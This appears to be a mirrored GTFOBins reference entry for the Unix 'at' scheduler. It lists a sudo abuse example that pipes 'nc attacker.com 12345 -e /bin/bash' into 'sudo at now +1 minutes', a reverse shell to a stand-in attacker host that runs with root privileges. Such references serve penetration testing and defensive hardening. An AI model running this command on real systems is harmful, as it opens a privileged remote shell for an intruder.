mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-18 05:21:35 +01:00
8 lines
242 B
Markdown
8 lines
242 B
Markdown
---
|
|
description: |
|
|
at is a command-line utility that allows you to schedule commands to be executed at a particular time.
|
|
functions:
|
|
sudo:
|
|
- code: |
|
|
echo "nc attacker.com 12345 -e /bin/bash" | sudo at now +1 minutes
|
|
--- |